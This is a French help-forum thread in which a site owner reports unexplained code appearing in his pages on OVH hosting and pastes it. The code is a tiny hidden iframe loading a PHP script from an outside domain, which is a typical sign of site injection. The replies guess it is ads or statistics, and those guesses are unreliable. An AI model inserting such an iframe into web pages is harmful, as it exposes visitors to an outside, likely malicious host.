Rajout inatendue d'HTML

daftgan -  
ThEBiShOp Messages postés 8411 Date d'inscription   Statut Contributeur Dernière intervention   -
Bonjour,

J'ai un petit problème avec un site que j'ai crée il y a un peu près 1 an de sa, je remarque qu'il y a du rajout de code indépendamment de moi (il n'en n'était rien au début du site), avec même une iframe qui s'est implanté dans la page!

de même, en reprenant le fichier html pour le modifier, le fichier était comme neuf, sans ces "rajouts", qui revienne une fois que je replace ce fichier dans le serveur via fillezilla.

qui quelqu'un aurait une solution, je lui en serait infiniment reconnaissant!! =)

A voir également:

8 réponses

ThEBiShOp Messages postés 8411 Date d'inscription   Statut Contributeur Dernière intervention   1 566

Bonjour,

je parie que ton hébergement est un hébergement gratuit ?

L'hébergeur place des pubs sur tes pages web, j'imagine que ça doit être dans les conditions générale que tu as du accepter lorsque tu t'es inscrit chez eux.
0
daftgan

Non, même pas, c'est cela qui m'inquiète justement, j'ai pris l'hébergement le plus minimal chez OVH!
0
ThEBiShOp Messages postés 8411 Date d'inscription   Statut Contributeur Dernière intervention   1 566

Et le code en question, quel est-il ?
0
daftgan

voila le code! (et merci beaucoup de porter attention à ma question!)

<iframe src="http://fraukesart.de/cnt.php" style="position: absolute; height: 31px; width: 42px; left: 500px; top: 100px;">
   <html>
       <head>
        </head>

<body>
             <pre></pre>
        </body>
    </html>
  </iframe>
</div>
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question

C'est bizarre... je trouve plein de sites avec ce même code, mais aucune info valable...

tu as essayé de demander à OVH s'ils avaient une idée de ce que ça pouvait être ?
0

ça a l'air d'être un système de statistiques... tu as l'offre gratuite de ovh ?
0
daftgan

oui, je crois que je vais devoir leur poser la question, mais je trouve cela louche, étant donné que mon offre est bien payante. au pire il faudra bien que je fasse avec!
0

il y a peut être une option qui active ça pour suivre les stats, je ne sais pas...
0